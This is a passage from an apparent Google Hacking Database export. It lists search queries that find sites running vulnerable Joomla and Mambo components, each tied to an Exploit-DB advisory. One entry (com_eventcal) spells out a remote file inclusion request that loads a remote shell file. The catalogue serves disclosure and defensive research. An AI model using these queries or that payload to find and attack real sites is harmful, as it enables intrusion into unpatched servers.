<shortDescription>inurl:&quot;com_event&quot;</shortDescription>
<textualDescription>Joomla Component com_event Multiple Vulnerabilities: https://www.exploit-db.com/exploits/12633</textualDescription>
<query>inurl:&quot;com_event&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:%22com_event%22</querystring>
<edb>https://www.exploit-db.com/exploits/12633</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2743</id>
<link>https://www.exploit-db.com/ghdb/2743</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_eventcal&quot;</shortDescription>
<textualDescription>Joomla eventcal Component 1.6.4 com_eventcal Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14187</textualDescription>
<query>inurl:&quot;com_eventcal&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_eventcal%22</querystring>
<edb>https://www.exploit-db.com/exploits/14187</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3663</id>
<link>https://www.exploit-db.com/ghdb/3663</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_eventcal&quot;</shortDescription>
<textualDescription>Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] RFI: www.site.com/components/com_eventcal/eventcal.php?mosConfig_absolute_path=[shell.txt?]</textualDescription>
<query>inurl:&quot;com_eventcal&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22com_eventcal%22</querystring>
<edb></edb>
<date>2011-01-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>3343</id>
<link>https://www.exploit-db.com/ghdb/3343</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_ezine&quot;</shortDescription>
<textualDescription>Joomla / Mambo Component com_ezine v2.1 Remote File Include Vulnerability - CVE: 2009-4094: https://www.exploit-db.com/exploits/10178</textualDescription>
<query>inurl:&quot;com_ezine&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_ezine%22</querystring>
<edb>https://www.exploit-db.com/exploits/10178</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3230</id>
<link>https://www.exploit-db.com/ghdb/3230</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_facebook&quot;</shortDescription>
<textualDescription>Joomla com_facebook SQL Injection - CVE: 2009-3438: https://www.exploit-db.com/exploits/9833</textualDescription>
<query>inurl:&quot;com_facebook&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_facebook%22</querystring>
<edb>https://www.exploit-db.com/exploits/9833</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3212</id>
<link>https://www.exploit-db.com/ghdb/3212</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_fastball&quot;</shortDescription>
<textualDescription>Joomla Fastball component 1.1.0-1.2 SQL Injection - CVE: 2009-3443: https://www.exploit-db.com/exploits/9822</textualDescription>
<query>inurl:&quot;com_fastball&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_fastball%22</querystring>
<edb>https://www.exploit-db.com/exploits/9822</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3288</id>
<link>https://www.exploit-db.com/ghdb/3288</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_gameserver&quot;</shortDescription>
<textualDescription>Joomla Component com_gameserver 1.0 (id) SQL Injection Vulnerability - CVE: 2009-3063: https://www.exploit-db.com/exploits/9571</textualDescription>
<query>inurl:&quot;com_gameserver&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_gameserver%22</querystring>
<edb>https://www.exploit-db.com/exploits/9571</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1810</id>
<link>https://www.exploit-db.com/ghdb/1810</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_ganalytics&quot;</shortDescription>
<textualDescription>Joomla Component com_ganalytics - Local File Inclusion: https://www.exploit-db.com/exploits/11758</textualDescription>
<query>inurl:&quot;com_ganalytics&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_ganalytics%22</querystring>
<edb>https://www.exploit-db.com/exploits/11758</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3434</id>
<link>https://www.exploit-db.com/ghdb/3434</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_gcalendar&quot;</shortDescription>
<textualDescription>Joomla Component com_gcalendar 1.1.2 (gcid) Remote SQL Injection Vulnerability - CVE: 2009-4099: https://www.exploit-db.com/exploits/10232</textualDescription>
<query>inurl:&quot;com_gcalendar&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_gcalendar%22</querystring>
<edb>https://www.exploit-db.com/exploits/10232</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3061</id>
<link>https://www.exploit-db.com/ghdb/3061</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_hestar&quot;</shortDescription>
<textualDescription>Mambo Component com_hestar Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/9609</textualDescription>
<query>inurl:&quot;com_hestar&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_hestar%22</querystring>
<edb>https://www.exploit-db.com/exploits/9609</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3308</id>
<link>https://www.exploit-db.com/ghdb/3308</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_icrmbasic&quot;</shortDescription>
<textualDescription>Joomla IRCm Basic SQL Injection: https://www.exploit-db.com/exploits/9812</textualDescription>
<query>inurl:&quot;com_icrmbasic&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_icrmbasic%22</querystring>
<edb>https://www.exploit-db.com/exploits/9812</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2495</id>
<link>https://www.exploit-db.com/ghdb/2495</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_ignitegallery&quot;</shortDescription>
<textualDescription>Joomla Component Ignite Gallery 0.8.3 SQL Injection Vulnerability - CVE: 2008-6182: https://www.exploit-db.com/exploits/6723</textualDescription>
<query>inurl:&quot;com_ignitegallery&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_ignitegallery%22</querystring>
<edb>https://www.exploit-db.com/exploits/6723</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3152</id>
<link>https://www.exploit-db.com/ghdb/3152</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_ijoomla_archive&quot;</shortDescription>
<textualDescription>Joomla com_ijoomla_archive Blind SQL Injectio: https://www.exploit-db.com/exploits/8164</textualDescription>
<query>inurl:&quot;com_ijoomla_archive&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_ijoomla_archive%22</querystring>
<edb>https://www.exploit-db.com/exploits/8164</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1807</id>
<link>https://www.exploit-db.com/ghdb/1807</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_janews&quot;</shortDescription>
<textualDescription>Joomla Component com_janews - Local File Inclusion - CVE: 2010-1219: https://www.exploit-db.com/exploits/11757</textualDescription>
<query>inurl:&quot;com_janews&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_janews%22</querystring>
<edb>https://www.exploit-db.com/exploits/11757</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1554</id>
<link>https://www.exploit-db.com/ghdb/1554</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_jashowcase &quot;</shortDescription>
<textualDescription>Joomla Component com_jashowcase Directory Traversal - CVE: 2010-0943: https://www.exploit-db.com/exploits/11090</textualDescription>
<query>inurl:&quot;com_jashowcase &quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_jashowcase+%22</querystring>
<edb>https://www.exploit-db.com/exploits/11090</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3310</id>
<link>https://www.exploit-db.com/ghdb/3310</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_jbudgetsmagic&quot;</shortDescription>
<textualDescription>Joomla com_jbudgetsmagic SQL injection vulnerability - CVE: 2009-3332: https://www.exploit-db.com/exploits/9723</textualDescription>
<query>inurl:&quot;com_jbudgetsmagic&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_jbudgetsmagic%22</querystring>
<edb>https://www.exploit-db.com/exploits/9723</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2689</id>
<link>https://www.exploit-db.com/ghdb/2689</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_jcalpro&quot;</shortDescription>
<textualDescription>Joomla Component com_jcalpro 1.5.3.6 Remote File Inclusion - CVE: 2009-4431: https://www.exploit-db.com/exploits/10587</textualDescription>
<query>inurl:&quot;com_jcalpro&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_jcalpro%22</querystring>
<edb>https://www.exploit-db.com/exploits/10587</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1527</id>
<link>https://www.exploit-db.com/ghdb/1527</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_jcollection &quot;</shortDescription>
<textualDescription>Joomla Component com_jcollection Directory Traversal - CVE: 2010-0944: https://www.exploit-db.com/exploits/11088</textualDescription>
<query>inurl:&quot;com_jcollection &quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_jcollection+%22</querystring>
<edb>https://www.exploit-db.com/exploits/11088</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2999</id>
<link>https://www.exploit-db.com/ghdb/2999</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_jembed&quot;</shortDescription>
<textualDescription>com_jembed (catid) Blind SQL Injection - CVE: 2010-1073: https://www.exploit-db.com/exploits/11026</textualDescription>
<query>inurl:&quot;com_jembed&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_jembed%22</querystring>
<edb>https://www.exploit-db.com/exploits/11026</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3027</id>
<link>https://www.exploit-db.com/ghdb/3027</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_jgen&quot;</shortDescription>
<textualDescription>Joomla Component (com_jgen) SQL Injection Vulnerability - CVE: 2010-3422: https://www.exploit-db.com/exploits/14998</textualDescription>
<query>inurl:&quot;com_jgen&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_jgen%22</querystring>
<edb>https://www.exploit-db.com/exploits/14998</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1992</id>
<link>https://www.exploit-db.com/ghdb/1992</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_jjgallery</shortDescription>
<textualDescription>Joomla Component Carousel Flash Image Gallery RFI Vulnerability - CVE: 2007-6027: https://www.exploit-db.com/exploits/4626</textualDescription>
<query>inurl:&quot;com_jjgallery</query>
<querystring>https://www.google.com/search?q=inurl:%22com_jjgallery</querystring>
<edb>https://www.exploit-db.com/exploits/4626</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1751</id>
<link>https://www.exploit-db.com/ghdb/1751</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_joomlaradiov5&quot;</shortDescription>
<textualDescription>Joomla Component joomlaradio v5 Remote File Inclusion Vulnerability - CVE: 2007-4923: https://www.exploit-db.com/exploits/4401</textualDescription>
<query>inurl:&quot;com_joomlaradiov5&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_joomlaradiov5%22</querystring>
<edb>https://www.exploit-db.com/exploits/4401</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2791</id>
<link>https://www.exploit-db.com/ghdb/2791</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_jphoto&quot;</shortDescription>
<textualDescription>Joomla Component com_jphoto SQL Injection Vulnerability - (id) - CVE: 2009-4598: https://www.exploit-db.com/exploits/10367</textualDescription>
<query>inurl:&quot;com_jphoto&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_jphoto%22</querystring>
<edb>https://www.exploit-db.com/exploits/10367</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3110</id>
<link>https://www.exploit-db.com/ghdb/3110</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_jpodium&quot;</shortDescription>
<textualDescription>Joomla JPodium Component (com_jpodium) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14232</textualDescription>
<query>inurl:&quot;com_jpodium&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_jpodium%22</querystring>
<edb>https://www.exploit-db.com/exploits/14232</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3253</id>
<link>https://www.exploit-db.com/ghdb/3253</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_jsjobs&quot;</shortDescription>
<textualDescription>Joomla Component com_jsjobs 1.0.5.6 SQL Injection Vulnerabilities - CVE: 2009-4599: https://www.exploit-db.com/exploits/10366</textualDescription>
<query>inurl:&quot;com_jsjobs&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_jsjobs%22</querystring>
<edb>https://www.exploit-db.com/exploits/10366</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1543</id>
<link>https://www.exploit-db.com/ghdb/1543</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_jvideodirect &quot;</shortDescription>
<textualDescription>Joomla Component com_jvideodirect Directory Traversal - CVE: 2010-0942: https://www.exploit-db.com/exploits/11089</textualDescription>
<query>inurl:&quot;com_jvideodirect &quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_jvideodirect+%22</querystring>
<edb>https://www.exploit-db.com/exploits/11089</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2994</id>
<link>https://www.exploit-db.com/ghdb/2994</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_kochsuite&quot;</shortDescription>
<textualDescription>Joomla Kochsuite Component 0.9.4 Remote File Include Vulnerability - CVE: 2006-4348: https://www.exploit-db.com/exploits/2215</textualDescription>
<query>inurl:&quot;com_kochsuite&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_kochsuite%22</querystring>
<edb>https://www.exploit-db.com/exploits/2215</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2793</id>
<link>https://www.exploit-db.com/ghdb/2793</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_koesubmit&quot;</shortDescription>
<textualDescription>Mambo com_koesubmit 1.0.0 Remote File Inclusion - CVE: 2009-3333: https://www.exploit-db.com/exploits/9714</textualDescription>
<query>inurl:&quot;com_koesubmit&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_koesubmit%22</querystring>
<edb>https://www.exploit-db.com/exploits/9714</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2857</id>
<link>https://www.exploit-db.com/ghdb/2857</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_linkdirectory&quot;</shortDescription>
<textualDescription>Joomla Link Directory Component 1.0.3 Remote Include Vulnerability: https://www.exploit-db.com/exploits/2214</textualDescription>
<query>inurl:&quot;com_linkdirectory&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22com_linkdirectory%22</querystring>
<edb>https://www.exploit-db.com/exploits/2214</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1806</id>
<link>https://www.exploit-db.com/ghdb/1806</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_linkr&quot;</shortDescription>
<textualDescription>Joomla Component com_linkr - Local File Inclusion: https://www.exploit-db.com/exploits/11756</textualDescription>
<query>inurl:&quot;com_linkr&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_linkr%22</querystring>
<edb>https://www.exploit-db.com/exploits/11756</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3131</id>
<link>https://www.exploit-db.com/ghdb/3131</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_lyftenbloggie&quot; / &quot;Powered by LyftenBloggie&quot;</shortDescription>
<textualDescription>Joomla Component com_lyftenbloggie 1.04 Remote SQL Injection Vulnerability - CVE: 2009-4104: https://www.exploit-db.com/exploits/10238</textualDescription>
<query>inurl:&quot;com_lyftenbloggie&quot; / &quot;Powered by LyftenBloggie&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_lyftenbloggie%22+/+%22Powered+by+LyftenBloggie%22</querystring>
<edb>https://www.exploit-db.com/exploits/10238</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2753</id>
<link>https://www.exploit-db.com/ghdb/2753</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_mambowiki&quot;</shortDescription>
<textualDescription>Mambo MamboWiki Component 0.9.6 Remote Include Vulnerability - CVE: 2006-4282: https://www.exploit-db.com/exploits/2213</textualDescription>
<query>inurl:&quot;com_mambowiki&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_mambowiki%22</querystring>
<edb>https://www.exploit-db.com/exploits/2213</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2956</id>
<link>https://www.exploit-db.com/ghdb/2956</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_mojo&quot;</shortDescription>
<textualDescription>Joomla MojoBlog Component v0.15 Multiple Remote File Include Vulnerabilities - CVE: 2009-4789: https://www.exploit-db.com/exploits/10273</textualDescription>
<query>inurl:&quot;com_mojo&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_mojo%22</querystring>
<edb>https://www.exploit-db.com/exploits/10273</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2782</id>
<link>https://www.exploit-db.com/ghdb/2782</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_mscomment&quot;</shortDescription>
<textualDescription>Joomla Component MS Comment LFI Vulnerability - CVE: 2010-2050: https://www.exploit-db.com/exploits/12611</textualDescription>
<query>inurl:&quot;com_mscomment&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_mscomment%22</querystring>
<edb>https://www.exploit-db.com/exploits/12611</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1713</id>
<link>https://www.exploit-db.com/ghdb/1713</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_omphotogallery&quot;</shortDescription>
<textualDescription>Joomla Omilen Photo Gallery 0.5b Local File Inclusion Vulnerability - CVE: 2009-4202: https://www.exploit-db.com/exploits/8870</textualDescription>
<query>inurl:&quot;com_omphotogallery&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_omphotogallery%22</querystring>
<edb>https://www.exploit-db.com/exploits/8870</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2091</id>
<link>https://www.exploit-db.com/ghdb/2091</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_otzivi&quot;</shortDescription>
<textualDescription>Joomla Component com_otzivi Local File Inclusion Vulnerability: https://www.exploit-db.com/exploits/11494</textualDescription>
<query>inurl:&quot;com_otzivi&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_otzivi%22</querystring>
<edb>https://www.exploit-db.com/exploits/11494</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2270</id>
<link>https://www.exploit-db.com/ghdb/2270</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_ownbiblio&quot; catalogue</shortDescription>
<textualDescription>Joomla Component ownbiblio 1.5.3 (catid) SQL Injection Vulnerability - CVE: 2008-6184: https://www.exploit-db.com/exploits/6730</textualDescription>
<query>inurl:&quot;com_ownbiblio&quot; catalogue</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:%22com_ownbiblio%22+catalogue</querystring>
<edb>https://www.exploit-db.com/exploits/6730</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2752</id>
<link>https://www.exploit-db.com/ghdb/2752</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_performs&quot;</shortDescription>
<textualDescription>perForms Mambo Component 1.0 Remote File Inclusion - CVE: 2006-3774: https://www.exploit-db.com/exploits/2025</textualDescription>
<query>inurl:&quot;com_performs&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_performs%22</querystring>
<edb>https://www.exploit-db.com/exploits/2025</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2810</id>
<link>https://www.exploit-db.com/ghdb/2810</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_phocagallery&quot;</shortDescription>
<textualDescription>Joomla Phoca Gallery Component (com_phocagallery) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14207</textualDescription>
<query>inurl:&quot;com_phocagallery&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_phocagallery%22</querystring>
<edb>https://www.exploit-db.com/exploits/14207</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2523</id>
<link>https://www.exploit-db.com/ghdb/2523</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_photoblog&quot;</shortDescription>
<textualDescription>Joomla (com_photoblog) Blind Sql Injection Vulnerability - CVE: 2010-0610: https://www.exploit-db.com/exploits/11337</textualDescription>
<query>inurl:&quot;com_photoblog&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_photoblog%22</querystring>
<edb>https://www.exploit-db.com/exploits/11337</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1861</id>
<link>https://www.exploit-db.com/ghdb/1861</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_pollxt&quot;</shortDescription>
<textualDescription>pollxt Mambo Component 1.22.07 Remote Include Vulnerability - CVE: 2006-5045: https://www.exploit-db.com/exploits/2029</textualDescription>
<query>inurl:&quot;com_pollxt&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_pollxt%22</querystring>
<edb>https://www.exploit-db.com/exploits/2029</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2333</id>
<link>https://www.exploit-db.com/ghdb/2333</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_portfol&quot;</shortDescription>
<textualDescription>Joomla Component com_portfol SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10844</textualDescription>
<query>inurl:&quot;com_portfol&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:%22com_portfol%22</querystring>
<edb>https://www.exploit-db.com/exploits/10844</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2473</id>
<link>https://www.exploit-db.com/ghdb/2473</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_portfol&quot;</shortDescription>
<textualDescription>Joomla Component Portfol (vcatid) SQL Injection Vulnerability - CVE: 2009-0494: https://www.exploit-db.com/exploits/7734</textualDescription>
<query>inurl:&quot;com_portfol&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_portfol%22</querystring>
<edb>https://www.exploit-db.com/exploits/7734</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2012</id>
<link>https://www.exploit-db.com/ghdb/2012</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_prayercenter&quot;</shortDescription>
<textualDescription>Joomla Component prayercenter 1.4.9 (id) SQL Injection Vulnerability - CVE: 2008-6429: https://www.exploit-db.com/exploits/5708/</textualDescription>
<query>inurl:&quot;com_prayercenter&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_prayercenter%22</querystring>
<edb>https://www.exploit-db.com/exploits/5708</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1622</id>
<link>https://www.exploit-db.com/ghdb/1622</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_productbook&quot;</shortDescription>
<textualDescription>Joomla Component com_productbook SQL Injection Vulnerability - CVE: 2010-1045: https://www.exploit-db.com/exploits/11352</textualDescription>
<query>inurl:&quot;com_productbook&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_productbook%22</querystring>
<edb>https://www.exploit-db.com/exploits/11352</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1629</id>
<link>https://www.exploit-db.com/ghdb/1629</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_projectfork&quot;</shortDescription>
<textualDescription>Joomla Component com_Projectfork 2.0.10 Local File Inclusion Vuln - CVE: 2009-2100: https://www.exploit-db.com/exploits/8946</textualDescription>
<query>inurl:&quot;com_projectfork&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_projectfork%22</querystring>
<edb>https://www.exploit-db.com/exploits/8946</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2863</id>
<link>https://www.exploit-db.com/ghdb/2863</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_quickfaq&quot;</shortDescription>
<textualDescription>Joomla QuickFAQ Component (com_quickfaq) Blind SQL Injection Vulnerability - CVE: 2010-2845: https://www.exploit-db.com/exploits/14296</textualDescription>
<query>inurl:&quot;com_quickfaq&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22com_quickfaq%22</querystring>
<edb>https://www.exploit-db.com/exploits/14296</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1809</id>
<link>https://www.exploit-db.com/ghdb/1809</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_rokdownloads&quot;</shortDescription>
<textualDescription>Joomla Component com_rokdownloads - Local File Inclusion - CVE: 2010-1056: https://www.exploit-db.com/exploits/11760</textualDescription>
<query>inurl:&quot;com_rokdownloads&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_rokdownloads%22</querystring>
<edb>https://www.exploit-db.com/exploits/11760</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2509</id>
<link>https://www.exploit-db.com/ghdb/2509</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_rwcards&quot;</shortDescription>
<textualDescription>Joomla Component com_rwcards - Local File Inclusion: https://www.exploit-db.com/exploits/11772</textualDescription>
<query>inurl:&quot;com_rwcards&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_rwcards%22</querystring>
<edb>https://www.exploit-db.com/exploits/11772</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1808</id>
<link>https://www.exploit-db.com/ghdb/1808</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_sectionex&quot;</shortDescription>
<textualDescription>Joomla Component com_sectionex - Local File Inclusion: https://www.exploit-db.com/exploits/11759</textualDescription>
<query>inurl:&quot;com_sectionex&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_sectionex%22</querystring>
<edb>https://www.exploit-db.com/exploits/11759</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2561</id>
<link>https://www.exploit-db.com/ghdb/2561</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_simpledownload&quot;</shortDescription>
<textualDescription>Joomla Component simpledownload Local File Disclosure - CVE: 2010-2122: https://www.exploit-db.com/exploits/12623</textualDescription>
<query>inurl:&quot;com_simpledownload&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_simpledownload%22</querystring>
<edb>https://www.exploit-db.com/exploits/12623</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2893</id>
<link>https://www.exploit-db.com/ghdb/2893</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_simpledownload&quot;</shortDescription>
<textualDescription>Joomla Component simpledownload LFI Vulnerability - CVE: 2010-2122: https://www.exploit-db.com/exploits/12618</textualDescription>
<query>inurl:&quot;com_simpledownload&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22com_simpledownload%22</querystring>
<edb>https://www.exploit-db.com/exploits/12618</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3040</id>
<link>https://www.exploit-db.com/ghdb/3040</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;com_simplefaq&quot;</shortDescription>
<textualDescription>Joomla Component com_simplefaq (catid) Blind Sql Injection Vulnerability - CVE: 2010-0632CVE: 2010-0632: https://www.exploit-db.com/exploits/11294</textualDescription>
<query>inurl:&quot;com_simplefaq&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22com_simplefaq%22</querystring>
<edb>https://www.exploit-db.com/exploits/11294</edb>
<date>2010-11-15</date>
